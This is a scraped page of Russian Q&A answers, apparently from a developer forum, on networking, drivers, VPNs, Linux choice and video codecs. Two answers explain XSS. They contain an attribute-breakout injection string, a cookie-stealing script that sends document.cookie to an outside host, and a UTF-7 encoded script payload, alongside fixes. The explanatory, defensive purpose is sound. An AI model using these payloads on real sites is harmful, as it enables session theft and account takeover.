Задать вопрос
  • Какие роли должны быть установлены на сервере для того,чтобы можно было установить standalone crm систему?

    inoise
    @inoise
    Solution Architect, AWS Certified, Serverless
    Нужно знать что это за crm чтобы что-то настраивать. В целом - CRM внутри сети ставится для локального пользования и безопасности. При этом доступ все-равно должен быть персонализирован по логин-паролю, а может даже и мультифактор. У нас в организации локально есть несколько систем и поэтому мы используем Identity Server для SSO через Active Directory.

    Единственное что в вашем вопросе касается сети это то что доступ к crm в принципе должен быть возможен только из нее (и иметь возможность, вероятно, иметь доступ по vpn, но это я уже додумываю)
    Ответ написан
    Комментировать
  • Насколько упадёт производительность видеокарты от Майкрософтовских драйверов?

    @res2001
    Developer, ex-admin
    Упадет. Это совсем не аналог.
    Возьмите драйвера для Вин8. Думаю, они и для десятки сгодятся.
    Ответ написан
    Комментировать
  • Можно ли спомощью впн в выдаче получать контент, будто в США?

    DexterHD
    @DexterHD
    Software Engineer, Teamlead, CTO
    Поможет, при условии что у вас будет VPN который позволяет выбирать сервер. В вашем случае нужно выбирать сервер на территории США, и при условии что вы будете использовать режим Инкогнито. Хотя хром например судя по всему берет данные о локализации еще и на основании настроек ОС. И понятное дело искать нужно будет на английском.
    Ответ написан
    2 комментария
  • Зависание при копировании файлов server 2016. Почему?

    mindtester
    @mindtester
    http://iczin.su/hexagram_48
    в железе - вполне возможно, беды вызывают длительные таймауты. но система обычно начинает семафорить что диск умирает. если сектора все таки отрабатывают со многих попыток, то может быть примерно так как вы описываете. виртуальный диск не причем, это просто файл. если физические харды разные проблема может быть на любом - как на источнике, так и на приемнике

    но вообще надо начинать с анализа системных логов. в 99% по ним можно вывести точный диагноз

    ps - еще монитор ресурсов может сразу показать наличие очередей на дисковые операции по всем физическим и логическим дискам, а так же процессы и файлы в обработке
    скрин (колонки во всех секциях кликабельны, по ним можно сортировать)
    spoiler
    QEBo2VN.png
    Ответ написан
    3 комментария
  • Как ограничить доступ в подсети?

    mindtester
    @mindtester
    http://iczin.su/hexagram_48
    Есть только ПК, являющийся шлюзом 192.168.0.1
    он не при делах внутри сети
    Как одному из компьютеров дать доступ ТОЛЬКО к одному ip из этой подсети?

    1 - можно настроить в ручную адреса на целевом компе:
    - для его собственной работы, в ручную прописать правильные ip, шлюз и днс (проследить что бы ip, был вне диапазона DHCP, а то рано или поздно произойдет конфликт адресов и сбой сети)
    - прописать на нем же второй адрес из другой подсети, допустим 192.168.10.1/24
    - на компе подвергаемом ограничениям, только один адрес, допустим 192.168.10.2/24, шлюз и днс не обязательны, ибо их в этой подсети нет
    .. возможно придется повозиться с настройками сетей - вторичная сеть должна быть частной у обоих компов, иначе ни чего не заработает. может потребоваться использование фала hosts. в общем место для творчества наверняка найдется

    2 - если сетевые карты всех компов поддерживают vlan - изучить что это такое и развести по vlan

    в любом случае самообразованием заниматься придется. но все решаемо

    ps - но если пользователь грамотный - это все будет в пустую (... или права урезать? смотреть надо)

    upd исправлена копипаста! (доп.сеть - 192.168.10.*)

    pps - а вообще - какая цель? может все гораздо проще?
    - доступ к файловым ресурсам и принтерам, можно развести по юзернеймам/паролям. свободные шары запретить
    - выход в интернет забанить персонально на шлюзе. гугл в помощ по ПО шлюза, но если там просто винда - своего фаервола за уши хватит для бана конкретного ip. просто на арестанте придется ставить фиксированный ip что бы все работало
    ... ну или смотрите сами что проще
    Ответ написан
    Комментировать
  • Как подобрать 5 рандомных чисел если есть только срерднеарифметическое этих чисел?

    GavriKos
    @GavriKos
    Все 5 чисел делаете равными 89. Далее берете 2 любых числа из этих пяти. Одно увеличиваете на n, другое уменьшаете. Важно подобрать n случайным образом, но так чтобы при увеличении/уменьшении числа не вышли за диапазоны (что в целом тоже просто). Повторяете все вот это столько раз сколько хотите.
    Ответ написан
    Комментировать
  • Как обьеденить локальные сети OpenVPN или L2TP или PPTP?

    @nevzorofff
    Сетевик
    У дачных девайсов нужно прописать машрут доомой через 192.168.8.100.
    А по нормальному - нужно между роутерами прокидывать ВПН, чтобы в локалке был один маршрутизатор. Прописывать маршруты на всех девайсах в сети - не комильфо.
    Ответ написан
    2 комментария
  • С какой целью может быть создан подозрительный WiFi у соседей с моими SSID/Ключом?

    DarWiM
    @DarWiM
    Больше похоже на то, что каким-то образом сосед узнал ваш пароль, например у вас включен WPS, и решил уменьшить свои расходы на доступ к интернету. Видимо этот человек настроил свой роутер как wifi repeater через wds.
    Имеет смысл выяснить квартиру соседа, анализируя зону сигнала, и пообщаться.
    Ответ написан
    1 комментарий
  • Почему частные IP адреса именно такие?

    mindtester
    @mindtester
    http://iczin.su/hexagram_48
    RFC - https://tools.ietf.org/html/rfc1918

    upd действительно, ответ DevMan (еще точнее каменты к нему) дополняет в части
    Почему эти диапазоны находятся так далеко?
    тут довольно наглядное пояснение www.vlsm-calc.net/ipclasses.php?lang=ru

    байка про пентагон не срабатывает ;))

    классность сети определяется не только длинной маски, но и битовой структурой первого октета, что очевидно удобно для программного анализа принадлежности адреса к классу, при маршрутизации. а видимое на глаз расхождение длины маски 172.16.0.0/12 и 192.168.0.0/16 с заявленными классами, на самом деле таковым не является - оба диапазона рекомендованы как наборы сетей классов B и C соответственно, но не как полностью доступные диапазоны:

    не 172.16.0.0/12 - а 16 сетей с 172.16.0.0/16 по 172.31.0.0/16
    не 192.168.0.0/16 - а 256 сетей с 192.168.0.0/24 по 192.168.255.0/24

    но и ни кто не запрещает нарушать данные рекомендации используя эти сети не строго B и C. так же как и 10.0.0.0/8 сплошь и рядом, используется для разбиения крупных корпоративных сетей, на гораздо более мелкие сегменты
    Ответ написан
    Комментировать
  • Почему частные IP адреса именно такие?

    vvpoloskin
    @vvpoloskin Куратор тега Компьютерные сети
    Инженер связи
    Ответ от создателей RFC1918.
    Ответ написан
    1 комментарий
  • Linux дистрибутив для предприятия?

    @akimdi
    Если Вам нужен хороший UI для пользователя, то однозначно нужно смотреть в сторону Linux Mint - он прост в освоении интерфейса. Люди которые привыкли работать на Windows легко смогут понять и перейти на Mint.
    А что бы организовать организовать централизованное управление, Вам лучше Ansible - там начиная от автоматическую установку программ и заканчивая настройкой файлов конфигураций.
    По поводу периферии и прочих, то лучше мяты никто не работает. Там все эти проприетарные кодеки, фирмвари и прочее.
    Так что Вам нужна мята желательно с корицей - однозначно !!! (Linux Mint 19 "Tara" - Cinnamon)
    Напишите пару плэйбуков на Ansible и быстро развернете что вам нужно.

    Ansible
    Linux Mint 19 Tara Cinnamon
    Ответ написан
    1 комментарий
  • Linux дистрибутив для предприятия?

    Установил xubuntu в небольшую фирму для тех же целей. Большинство приходящих даже не замечают. Наверное, думают, что это тема для Винды. Стоит уже два года, никаких нареканий.
    Ответ написан
  • Как работают видеоредакторы?

    nidalee
    @nidalee
    Зависит от кодека. В целом, да: видео - всего лишь слайдшоу. С большой частотой кадров.
    Видео даже можно просчитать в последовательность изображений в большинстве редакторов. И потом так же импортировать обратно в него.
    Вопреки некоторым мнениям, прямой зависимости кодека (а соответственно размера файла) от расширения (будь то avi, mp4 или mov) нет. Расширение связано с контейнером, который сам по себе - всего лишь компиляция звукового и видео -файлов. Можно переименовать тот же mp4 в avi - во многих плеерах он все равно будет открываться.
    Что касается кодеков, то тут уже кто во что горазд. Их много, и про все рассказывать просто долго. Если очень грубо: видеофайлы получаются разными по качеству и объёму как раз из-за кодеков. Они разделяют каждый кадр на N количество частей, плюс разделяют их в... 4 измерении - времени (На самом деле в 3-х, ведь у видео нет глубины, ну да ладно). Допустим, на отрезки GOP по 25 кадров (про них можно почитать здесь).
    Если в квадрате N1 ничего за 25 кадров не изменилось, то он остается, новый не пишется - уменьшается размер файла. Если изменилось - там уже возможны варианты. Наглядно, так делит на квадраты H264 и H265. Вот еще страшные картинки. Из-за этих же квадратов чересчур пережатое видео рассыпается на квадраты - они просто начинают слишком сильно отличаться от соседей, теряются градиенты и тому подобное. И из-за этих же квадратов не советуют пережимать видеофайлы в lossy-кодеки, вообще. Потому что качество в любом случае станет хуже, ведь уже сжатое сжимается опять.
    Что касается камер - тут уже понятия не имею, как и что они делают, чтобы сделать кадр, а из набора кадров - видео. :)
    Ответ написан
    Комментировать
  • Как установить windows 8.1?

    oia
    @oia
    Да это же просто дос загрузка, создай rufus.akeo.ie флешку и укажи путь к Исо образу винды
    Ответ написан
    2 комментария
  • Microsoft вводит "песочницу" для потенциально опасных приложений в Windows 10. Усилит ли это безопасность ОС и насколько?

    Stalker_RED
    @Stalker_RED
    По описанию похоже на sandboxie. Защита не 100%, но сильно лучше, чем ничего.

    Ну и главная проблема остается: опасное приложение показывает табличку с надписью "ваш антивирус мешает рабооте этого чудесного редактора рингтонов" и юзеры радостно все отключают.
    Ответ написан
    1 комментарий
  • Почему не возможно дозвониться до некоторых мобильных номеров?

    k3NGuru
    @k3NGuru Автор вопроса
    Сис.админ.КО., подающий надежды кодер :)
    Wireshark вообще сказал, что нет SIP соединений :) зато доблестный Syslog сообщил много интересностей. Ответ от ТП Eltex:
    *******************************************
    Ясно судя по логу, происходит следующее:
    -мы отдаем INVITE с тегом Supported: 100rel, в этом случае взаимодействующий шлюз по своему усмотрению может передавать предварительные ответы либо надежно, либо нет;
    -взаимодействующий шлюз(%SIP_SERVER%) выбирает передавать предварительные ответы надежно, т.к в сообщении 183 присутствует тег Require: 100rel
    -получив это сообщение, тау соответственно его подтверждает сообщением PRACK
    -на которое затем ругается SIP провайдер сообщением 481 Call Leg/Transaction Does Not Exis
    -и затем мы(тау) отбиваем вызов.

    Варианты решения:
    1) (НЕ РЕКОМЕНДУЕТСЯ)В настройках SIP профиля изменить опцию "100rel" в положение off. Тогда мы не будем передавать в INVITE тег Supported: 100rel и данная цепочка не повториться. Но тогда при поступлении входящего вызова с тегом Supported: 100rel или Require: 100rel
    тау будет ругаться сообщением 420.

    2)(РЕКОМЕНДУЕТСЯ) Узнайте у вашего SIP провайдера: "почему он сначала передает 183 с Require: 100rel, а затем ругается на наше подтверждение PRACK? ведь он сам говорит, что мол я поддерживаю подтверждение, поэтому тау и передает PRACK."
    Если SIP сервер не поддерживает подтверждение предварительных ответов (RFC 3262), то он не должен передавать Require: 100rel в 183 сообщении.
    *******************************************

    Сделал по первому варианту, все заработало. У провайдера так и не получилось, что-либо выяснить.
    Ответ написан
    Комментировать
  • Как выдавать DHCP только указанным клиентам?

    Veneomin
    @Veneomin Автор вопроса
    Разобрался. Оказывается в статическом биндинге можно указать вместо конкретного IP адреса целый пул если он уже создан.
    Ответ написан
    Комментировать
  • Зачем во избежание XSS нужно указывать на каждой странице кодировку, если злоумышленник все равно может изменить ее?

    @JunDevTest
    Контакты: thejundev@gmail.com | @juniordev
    XSS это эксплуатация уязвимостей в HTML, JS и других скриптах.

    3. Указывайте кодировку на каждой веб-странице.

    Кодировку нужно указывать, так как некоторые браузеры могут её неправильно определить и текстовой контент на сайте станет нечитаемым.

    В случае если тег расположен до тега и заполняется пользовательскими данными

    Нужно фильтровать пользовательские данные, в том числе, когда они встраиваются в HTML разметку.
    Например, вы разрешаете пользователям изменять фоновую картинку в своём профиле.
    У вас есть текстовое поле, в которое пользователь вводит ссылку на картинку. После этого вы подставляете картинку пользователя, например из базы данных в переменную $user_background.
    Таким образом, код на странице пользователя, выглядит как-то так:
    <body style="background: #282b31 url($user_background) 50% 0 repeat;">
    ...
    </body>

    Пользователь вставляет свою ссылку example.com/image.png и в коде страницы, это выглядит так:
    <body style="background: #282b31 url(http://example.com/image.png) 50% 0 repeat;">
    ...
    </body>

    Казалось-бы, что здесь не так. Если пользователь вставит сюда что-нибудь кроме картинки, то ничего не будет, по правилам CSS, зачем что-то фильтровать или... нет.
    Предположим, школохацкер вставит вместо картинки какой-нибудь тег:
    <script>alert('Мамку админа ипал!!111');</script>
    В таком случае, как правило, ничего не произойдёт, но может съехать вёрстка, что уже признак уязвимости. Дальше у нашего хакира бомбанёт пупкан и он попросит помощи у старшего брата из группировки Онанимусов. Добрый братик изменит эту строчку так, чтобы превратить её в активную XSS уязвимость ( правильно говорить "раскрутит" её ).
    На этом этапе строчка будет выглядеть как-то так:
    http://example.com/image.png') 50% 0 repeat;"><script>alert('Мамку админа ипал!!111');</script><input type="hidden" style="background: #282b31 url(

    Она не только радостно поприветствует алертом каждого, кто зайдёт на эту страницу, но ещё и установит картинку и не испортит вёрстку сайта, да ещё и к тому же не нарушит правил CSS. Итак, это и есть XSS уязвимость.
    Они к слову, бывают нескольких видов. Активные и пассивные.
    Чтобы расширить свой кругозор в области XSS, рекоммендую прочесть старый как помёт мамонта, мануал на форуме Antichat: forum.antichat.ru/threads/20140/ ( странно, ссылка вырезается, не уж то Ачат на Тостере под запретом? ).

    Что тут происходит?!
    Из-за отсутствия фильтрации текст из поля, сохраняется в БД в первоначальном виде. Как только он попадает на страницу, начинается самое интересное ^_^.
    Сначала код устанавливает картинку на фон, потом благополучно закрывает этот тег. После этого идёт "пейлоад", то есть JS код, например. С таким же успехом, можно запихнуть туда, например тег test или кучу ссылок на продажу виагры с анкорами, тем самым подняв некоторые показатели, например, индекс цитируемости (ТИЦ) для своих ссылок. После этого мы создаём новый тег input, делаем его скрытым и тем самым закрываем тег ( по стандартам html, этот элемент не нуждается в закрывающемся теге ). Уязвимость готова.

    Что ещё?
    Ну если вам этого недостаточно то можно "выипать админа" с помощью соц. инженерии и... той самой XSS. Для этого достаточно лишь поменять код JS на что-то вроде:
    <script>$.get('http://example.com/adminlox.php?sniffer=' + document.cookie);</script>

    и если у нубоадмина нет httponly у куков, то можно получить данные админа и войти под его аккаунтом или даже попасть в админку сайта. Дальше можно кое-что залить, но это уже совсем другая история... :3

    Как фиксить?
    Как минимум в этом конкретном случае, обернуть PHP переменную $user_background в
    htmlspecialchars($user_background, ENT_QUOTES, 'UTF-8');
    таким образом, код, показанный выше уже работать не будет. Дальше нужно установить httponly у сессионных Cookie (если ещё не стоит), для этого нужно заменить вашу конструкцию, на что-то вроде этого:
    header( "Set-Cookie: name=value; httpOnly" );
    или так
    setcookie('Foo','Bar',0,'/', 'www.sample.com'  , FALSE, TRUE);

    ну и вообще, перед тем как что-то писать, лучше прочтите хотя-бы одну книгу по PHP7.x, JS ec6, HTML5,CSS3. Я сам их не читал, поэтому это можете спросить здесь, новым вопросом. Здесь есть ребята, которые могут подсказать действительно годную и современную литературу.
    Удачи вам, в познании XSS.
    Ответ написан
    Комментировать
  • Зачем во избежание XSS нужно указывать на каждой странице кодировку, если злоумышленник все равно может изменить ее?

    @Mercury13
    Программист на «си с крестами» и не только
    Совет несколько устаревший, и вот он для чего.
    Есть откровенно странная кодировка под названием UTF-7, которую по-чёрному использовали для XSS. Например:
    +ADw-script+AD4-alert(+ACc-utf-7!+ACc-)+ADw-+AC8-script+AD4-


    Задачей хакера было заставить браузер верить, что текст в UTF-7, прежде чем в HTML’е придёт маркер кодировки.
    IE11 поддерживал UTF-7, поддерживает ли Edge — не в курсе. Остальные браузеры отказались лет десять назад.

    Подробнее:
    https://nedbatchelder.com/blog/200704/xss_with_utf...

    Ну и будет просто некрасиво, если пользовательские данные появляются до маркера кодировки и браузер эту самую кодировку неверно опознал. Но хоть XSS не будет ни в одной кодировке, основанной на ASCII.
    Ответ написан
    3 комментария